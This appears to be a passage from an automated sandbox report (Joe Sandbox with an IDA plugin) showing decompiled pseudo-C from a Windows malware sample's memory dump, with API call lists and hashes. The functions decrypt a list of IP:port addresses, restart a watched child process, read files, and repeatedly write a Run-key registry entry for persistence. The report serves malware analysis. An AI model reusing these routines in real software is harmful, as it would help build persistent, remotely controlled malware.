                                                                                                                                                                                                                                                    								if(_v40 != 0) {
                                                                                                                                                                                                                                                    									_v48 = 0;
                                                                                                                                                                                                                                                    									while(_v48 < _v36) {
                                                                                                                                                                                                                                                    										_t64 = E00EC7B70( &_v44, _v48 * 6 + _v32, 4);
                                                                                                                                                                                                                                                    										_push(_v44);
                                                                                                                                                                                                                                                    										L00ECB1EC();
                                                                                                                                                                                                                                                    										_v52 = _t64;
                                                                                                                                                                                                                                                    										wnsprintfA(_v48 * 0x28 + _v40, 0x28, "%s:%u", _v52,  *(_v32 + 4 + _v48 * 6) & 0x0000ffff);
                                                                                                                                                                                                                                                    										_t98 = _t98 + 0x20;
                                                                                                                                                                                                                                                    										_v8 = _v8 + 1;
                                                                                                                                                                                                                                                    										_v48 = _v48 + 1;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									 *_a4 = _v40;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                    			}
























                                                                                                                                                                                                                                                    0x00ec7976
                                                                                                                                                                                                                                                    0x00ec7981
                                                                                                                                                                                                                                                    0x00ec7987
                                                                                                                                                                                                                                                    0x00ec798e
                                                                                                                                                                                                                                                    0x00ec79a3
                                                                                                                                                                                                                                                    0x00ec79a9
                                                                                                                                                                                                                                                    0x00ec79b0
                                                                                                                                                                                                                                                    0x00ec79bf
                                                                                                                                                                                                                                                    0x00ec79c6
                                                                                                                                                                                                                                                    0x00ec79cd
                                                                                                                                                                                                                                                    0x00ec79d2
                                                                                                                                                                                                                                                    0x00ec79d5
                                                                                                                                                                                                                                                    0x00ec79df
                                                                                                                                                                                                                                                    0x00ec79ed
                                                                                                                                                                                                                                                    0x00ec7a10
                                                                                                                                                                                                                                                    0x00ec7a15
                                                                                                                                                                                                                                                    0x00ec7a1a
                                                                                                                                                                                                                                                    0x00ec7a29
                                                                                                                                                                                                                                                    0x00ec7a38
                                                                                                                                                                                                                                                    0x00ec7a51
                                                                                                                                                                                                                                                    0x00ec7a58
                                                                                                                                                                                                                                                    0x00ec7a5a
                                                                                                                                                                                                                                                    0x00ec7a6c
                                                                                                                                                                                                                                                    0x00ec7a84
                                                                                                                                                                                                                                                    0x00ec7a8f
                                                                                                                                                                                                                                                    0x00ec7a90
                                                                                                                                                                                                                                                    0x00ec7a95
                                                                                                                                                                                                                                                    0x00ec7abc
                                                                                                                                                                                                                                                    0x00ec7ac2
                                                                                                                                                                                                                                                    0x00ec7acb
                                                                                                                                                                                                                                                    0x00ec7a69
                                                                                                                                                                                                                                                    0x00ec7a69
                                                                                                                                                                                                                                                    0x00ec7ad6
                                                                                                                                                                                                                                                    0x00ec7ad6
                                                                                                                                                                                                                                                    0x00ec7a58
                                                                                                                                                                                                                                                    0x00ec7a1a
                                                                                                                                                                                                                                                    0x00ec7ae3
                                                                                                                                                                                                                                                    0x00ec7ae3
                                                                                                                                                                                                                                                    0x00ec79b0
                                                                                                                                                                                                                                                    0x00ec7aef

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,000075BC,00003000,00000004), ref: 00EC79A3
                                                                                                                                                                                                                                                      • Part of subcall function 00ECA400: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 00ECA45C
                                                                                                                                                                                                                                                      • Part of subcall function 00ECA400: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ECA480
                                                                                                                                                                                                                                                      • Part of subcall function 00ECA400: RegCloseKey.KERNEL32(00000000), ref: 00ECA494
                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00EC7AE3
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8A70: CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00EC8AD3
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8A70: GetLastError.KERNEL32 ref: 00EC8ADD
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8A70: CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00EC8B0C
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 00EC8B37
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EC8B5E
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00EC8B7A
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 00EC8B87
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 00EC8B91
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00EC8B9D
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00EC7A4B
                                                                                                                                                                                                                                                    • inet_ntoa.WS2_32(?), ref: 00EC7A90
                                                                                                                                                                                                                                                    • wnsprintfA.SHLWAPI ref: 00EC7ABC
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$CloseDecryptErrorFreeLastOpenQueryReleaseValueinet_ntoawnsprintf
                                                                                                                                                                                                                                                    • String ID: %s:%u$Topdawabe
                                                                                                                                                                                                                                                    • API String ID: 1891311255-2787945377
                                                                                                                                                                                                                                                    • Opcode ID: b10b82503e492ad0e26ac88dd72df800b17345fc6e8adf34af8635a52f8ebc4b
                                                                                                                                                                                                                                                    • Instruction ID: fc8e1081f5894f65223333562e121e31d912006a22fb1d58952a9364a6446b1b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b10b82503e492ad0e26ac88dd72df800b17345fc6e8adf34af8635a52f8ebc4b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55414CB1E04208EFEB04DB94CD86FEEBBB5EB48704F148059E605BB280D7759A45CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                                    			E00EC4AC0(intOrPtr _a4) {
                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = _a4;
                                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                                    					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_v8 + 8)) <= 0 || WaitForSingleObject( *(_v8 + 0x24), 0x64) != 0x102) {
                                                                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                                                                    							Sleep(0x1388); // executed
                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						EnterCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                    						_v20 = 0;
                                                                                                                                                                                                                                                    						_v12 = 0;
                                                                                                                                                                                                                                                    						_t31 = E00EC8250( *((intOrPtr*)(_v8 + 4)),  *((intOrPtr*)(_v8 + 8)),  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                                    						_t50 = _t50 + 0x10;
                                                                                                                                                                                                                                                    						_v16 = _t31;
                                                                                                                                                                                                                                                    						LeaveCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                    						if(_v16 <= 0) {
                                                                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						E00EC62B0(_v20, _v16); // executed
                                                                                                                                                                                                                                                    						VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                    						SetEvent( *(_v8 + 0x24));
                                                                                                                                                                                                                                                    						__imp__CoUninitialize();
                                                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				L8:
                                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                    0x00ec4ac9
                                                                                                                                                                                                                                                    0x00ec4ad0
                                                                                                                                                                                                                                                    0x00ec4ad8
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec4ade
                                                                                                                                                                                                                                                    0x00ec4ae5
                                                                                                                                                                                                                                                    0x00ec4b80
                                                                                                                                                                                                                                                    0x00ec4b85
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec4b85
                                                                                                                                                                                                                                                    0x00ec4b08
                                                                                                                                                                                                                                                    0x00ec4b0e
                                                                                                                                                                                                                                                    0x00ec4b15
                                                                                                                                                                                                                                                    0x00ec4b32
                                                                                                                                                                                                                                                    0x00ec4b37
                                                                                                                                                                                                                                                    0x00ec4b3a
                                                                                                                                                                                                                                                    0x00ec4b44
                                                                                                                                                                                                                                                    0x00ec4b4e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec4b58
                                                                                                                                                                                                                                                    0x00ec4b6b
                                                                                                                                                                                                                                                    0x00ec4b78
                                                                                                                                                                                                                                                    0x00ec4b90
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec4b90
                                                                                                                                                                                                                                                    0x00ec4ade
                                                                                                                                                                                                                                                    0x00ec4b96
                                                                                                                                                                                                                                                    0x00ec4b9b

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00EC4AD8
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064), ref: 00EC4AF4
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(-0000000C), ref: 00EC4B08
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(-0000000C), ref: 00EC4B44
                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00EC4B6B
                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 00EC4B78
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001388), ref: 00EC4B85
                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00EC4B90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterEventFreeInitializeLeaveObjectSingleSleepUninitializeVirtualWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3462651527-0
                                                                                                                                                                                                                                                    • Opcode ID: f0f28cd5d3ffaf718e38f02d1e8a9a2f82c8597682994d549c65c06a113e0c30
                                                                                                                                                                                                                                                    • Instruction ID: c5c46a4c04c085a437679692afb1f2614160567d59eab800b4596ad3c2dd42c5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0f28cd5d3ffaf718e38f02d1e8a9a2f82c8597682994d549c65c06a113e0c30
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F219DB4900208EFC704DFA4DA59FAEB7B9EB48305F208558E509B7291D732EE46CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                                    			E00EC77B0(void** _a4) {
                                                                                                                                                                                                                                                    				void** _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				long _v16;
                                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                                                                    				void** _v28;
                                                                                                                                                                                                                                                    				int _t37;
                                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                                    				void* _t60;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                    					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                    					_v12 = 0x96;
                                                                                                                                                                                                                                                    					_v16 = 0x1388;
                                                                                                                                                                                                                                                    					_v8 = _a4;
                                                                                                                                                                                                                                                    					if( *_v8 != 0) {
                                                                                                                                                                                                                                                    						_v20 = 0;
                                                                                                                                                                                                                                                    						while(_v20 < 0x96) {
                                                                                                                                                                                                                                                    							_v24 = 0;
                                                                                                                                                                                                                                                    							_t37 = GetExitCodeProcess(_v8[3],  &_v24); // executed
                                                                                                                                                                                                                                                    							if(_t37 == 0) {
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								if(_v24 != 0x103) {
                                                                                                                                                                                                                                                    									CloseHandle(_v8[3]);
                                                                                                                                                                                                                                                    									Sleep(0x7530);
                                                                                                                                                                                                                                                    									_t40 = E00EC2070( *_v8);
                                                                                                                                                                                                                                                    									_t60 = _t60 + 4;
                                                                                                                                                                                                                                                    									_v8[3] = _t40;
                                                                                                                                                                                                                                                    									if(_v8[3] != 0) {
                                                                                                                                                                                                                                                    										_v20 = _v20 + 1;
                                                                                                                                                                                                                                                    										if((_v8[2] & 0x00000004) != 0) {
                                                                                                                                                                                                                                                    											E00EC2510(_v8[3], 0xece290);
                                                                                                                                                                                                                                                    											_t60 = _t60 + 8;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										goto L11;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									Sleep(0x1388); // executed
                                                                                                                                                                                                                                                    									L11:
                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						VirtualFree( *_v8, 0, 0x8000);
                                                                                                                                                                                                                                                    						_v28 = _v8;
                                                                                                                                                                                                                                                    						E00EC97C0(_v28);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					__imp__CoUninitialize();
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                    0x00ec77ba
                                                                                                                                                                                                                                                    0x00ec77c2
                                                                                                                                                                                                                                                    0x00ec77c8
                                                                                                                                                                                                                                                    0x00ec77cf
                                                                                                                                                                                                                                                    0x00ec77d9
                                                                                                                                                                                                                                                    0x00ec77e2
                                                                                                                                                                                                                                                    0x00ec77e8
                                                                                                                                                                                                                                                    0x00ec77ef
                                                                                                                                                                                                                                                    0x00ec77fc
                                                                                                                                                                                                                                                    0x00ec780e
                                                                                                                                                                                                                                                    0x00ec7816
                                                                                                                                                                                                                                                    0x00ec7818
                                                                                                                                                                                                                                                    0x00ec781f
                                                                                                                                                                                                                                                    0x00ec7835
                                                                                                                                                                                                                                                    0x00ec7840
                                                                                                                                                                                                                                                    0x00ec784c
                                                                                                                                                                                                                                                    0x00ec7851
                                                                                                                                                                                                                                                    0x00ec7857
                                                                                                                                                                                                                                                    0x00ec7861
                                                                                                                                                                                                                                                    0x00ec786d
                                                                                                                                                                                                                                                    0x00ec7879
                                                                                                                                                                                                                                                    0x00ec7887
                                                                                                                                                                                                                                                    0x00ec788c
                                                                                                                                                                                                                                                    0x00ec788c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec7863
                                                                                                                                                                                                                                                    0x00ec7821
                                                                                                                                                                                                                                                    0x00ec7826
                                                                                                                                                                                                                                                    0x00ec788f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec7893
                                                                                                                                                                                                                                                    0x00ec781f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec7816
                                                                                                                                                                                                                                                    0x00ec78a5
                                                                                                                                                                                                                                                    0x00ec78ae
                                                                                                                                                                                                                                                    0x00ec78b5
                                                                                                                                                                                                                                                    0x00ec78ba
                                                                                                                                                                                                                                                    0x00ec78bd
                                                                                                                                                                                                                                                    0x00ec78bd
                                                                                                                                                                                                                                                    0x00ec78c8

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00EC77C2
                                                                                                                                                                                                                                                    • GetExitCodeProcess.KERNEL32 ref: 00EC780E
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001388), ref: 00EC7826
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00001388), ref: 00EC7835
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00007530), ref: 00EC7840
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000096,00000000,00008000), ref: 00EC78A5
                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00EC78BD
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleep$CloseCodeExitFreeHandleInitializeProcessUninitializeVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2326833528-0
                                                                                                                                                                                                                                                    • Opcode ID: 5eba55635887c23239e5372450d1c8fe373356212b9ad8e3bfefb0c117b76510
                                                                                                                                                                                                                                                    • Instruction ID: 564af57bb4fd061b59c9b682bf3a48412b717ac1df21d52f47a39066223824d4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5eba55635887c23239e5372450d1c8fe373356212b9ad8e3bfefb0c117b76510
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F318C75904209EFDB04CFA0DA49FAEB7B1FB48305F208568E509B7290D7729E46DF91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC5CD0(CHAR* _a4) {
                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                    				long _v16;
                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 != 0 && lstrlenA(_a4) >= 4) {
                                                                                                                                                                                                                                                    					_t29 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                    					_v12 = _t29;
                                                                                                                                                                                                                                                    					if(_v12 != 0xffffffff) {
                                                                                                                                                                                                                                                    						_v16 = GetFileSize(_v12, 0);
                                                                                                                                                                                                                                                    						if(_v16 > 0) {
                                                                                                                                                                                                                                                    							_t34 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                    							_v20 = _t34;
                                                                                                                                                                                                                                                    							if(_v20 != 0) {
                                                                                                                                                                                                                                                    								_v24 = 0;
                                                                                                                                                                                                                                                    								ReadFile(_v12, _v20, _v16,  &_v24, 0); // executed
                                                                                                                                                                                                                                                    								if(_v24 == _v16) {
                                                                                                                                                                                                                                                    									_v8 = E00EC16F0(_v20, _v16);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						FindCloseChangeNotification(_v12); // executed
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                    0x00ec5cd6
                                                                                                                                                                                                                                                    0x00ec5ce1
                                                                                                                                                                                                                                                    0x00ec5d10
                                                                                                                                                                                                                                                    0x00ec5d16
                                                                                                                                                                                                                                                    0x00ec5d1d
                                                                                                                                                                                                                                                    0x00ec5d2f
                                                                                                                                                                                                                                                    0x00ec5d36
                                                                                                                                                                                                                                                    0x00ec5d45
                                                                                                                                                                                                                                                    0x00ec5d4b
                                                                                                                                                                                                                                                    0x00ec5d52
                                                                                                                                                                                                                                                    0x00ec5d54
                                                                                                                                                                                                                                                    0x00ec5d6d
                                                                                                                                                                                                                                                    0x00ec5d79
                                                                                                                                                                                                                                                    0x00ec5d8b
                                                                                                                                                                                                                                                    0x00ec5d8b
                                                                                                                                                                                                                                                    0x00ec5d99
                                                                                                                                                                                                                                                    0x00ec5d99
                                                                                                                                                                                                                                                    0x00ec5d52
                                                                                                                                                                                                                                                    0x00ec5da3
                                                                                                                                                                                                                                                    0x00ec5da3
                                                                                                                                                                                                                                                    0x00ec5d1d
                                                                                                                                                                                                                                                    0x00ec5daf

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00EC5CEB
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EC5D10
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00EC5D29
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00EC5D45
                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 00EC5D6D
                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00EC5D99
                                                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00EC5DA3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$Virtual$AllocChangeCloseCreateFindFreeNotificationReadSizelstrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 443218420-0
                                                                                                                                                                                                                                                    • Opcode ID: ab398c0a0cb204cae2e783aeb63e5be15e60270d76e44f6bc344dd82bfd75ccd
                                                                                                                                                                                                                                                    • Instruction ID: 64ed02a689a2ca59460b80699721f2576cff0b7111bccec9eaa3eeab132093c5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab398c0a0cb204cae2e783aeb63e5be15e60270d76e44f6bc344dd82bfd75ccd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED21FB75A00208FFDB10DBA5CD49FAE7B74AB48705F208558F619B72C0C775AA85CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC12D0(CHAR* _a4) {
                                                                                                                                                                                                                                                    				CHAR* _v8;
                                                                                                                                                                                                                                                    				char* _v12;
                                                                                                                                                                                                                                                    				CHAR* _v16;
                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                    				int _v28;
                                                                                                                                                                                                                                                    				long _t26;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = _a4;
                                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                                    					_v16 = _v8;
                                                                                                                                                                                                                                                    					_v12 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                    					while( *0xed4370 == 0) {
                                                                                                                                                                                                                                                    						_v20 = 0x80000001;
                                                                                                                                                                                                                                                    						if(( *(_v8 + 0x30c) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    							_v20 = 0x80000002;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v24 = 0;
                                                                                                                                                                                                                                                    						_t26 = RegOpenKeyExA(_v20, _v12, 0, 0xf003f,  &_v24); // executed
                                                                                                                                                                                                                                                    						if(_t26 == 0) {
                                                                                                                                                                                                                                                    							_v28 = lstrlenA(_v16);
                                                                                                                                                                                                                                                    							RegSetValueExA(_v24, _v8 + 0x208, 0, 1, _v16, _v28); // executed
                                                                                                                                                                                                                                                    							RegCloseKey(_v24); // executed
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						Sleep(0x1388); // executed
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                    0x00ec12d9
                                                                                                                                                                                                                                                    0x00ec12e0
                                                                                                                                                                                                                                                    0x00ec12e9
                                                                                                                                                                                                                                                    0x00ec12ec
                                                                                                                                                                                                                                                    0x00ec12f3
                                                                                                                                                                                                                                                    0x00ec1301
                                                                                                                                                                                                                                                    0x00ec1314
                                                                                                                                                                                                                                                    0x00ec1316
                                                                                                                                                                                                                                                    0x00ec1316
                                                                                                                                                                                                                                                    0x00ec131d
                                                                                                                                                                                                                                                    0x00ec1337
                                                                                                                                                                                                                                                    0x00ec133f
                                                                                                                                                                                                                                                    0x00ec134b
                                                                                                                                                                                                                                                    0x00ec1368
                                                                                                                                                                                                                                                    0x00ec1372
                                                                                                                                                                                                                                                    0x00ec1372
                                                                                                                                                                                                                                                    0x00ec137d
                                                                                                                                                                                                                                                    0x00ec137d
                                                                                                                                                                                                                                                    0x00ec12fc
                                                                                                                                                                                                                                                    0x00ec138d

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,00000000), ref: 00EC1337
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00EC1345
                                                                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(00000000,-00000208,00000000,00000001,?,?), ref: 00EC1368
                                                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 00EC1372
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001388), ref: 00EC137D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseOpenSleepValuelstrlen
                                                                                                                                                                                                                                                    • String ID: software\microsoft\windows\currentversion\run
                                                                                                                                                                                                                                                    • API String ID: 3411147897-1396020897
                                                                                                                                                                                                                                                    • Opcode ID: 0d3688bba5d2f33d316b2d1606871ef4308ecd2d92fb3535f5e2d4e30f536e8d
                                                                                                                                                                                                                                                    • Instruction ID: 9a3ab529f1f3b344f786ee342d205f501db77e8bdc1c8a8aff881134cca78655
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d3688bba5d2f33d316b2d1606871ef4308ecd2d92fb3535f5e2d4e30f536e8d
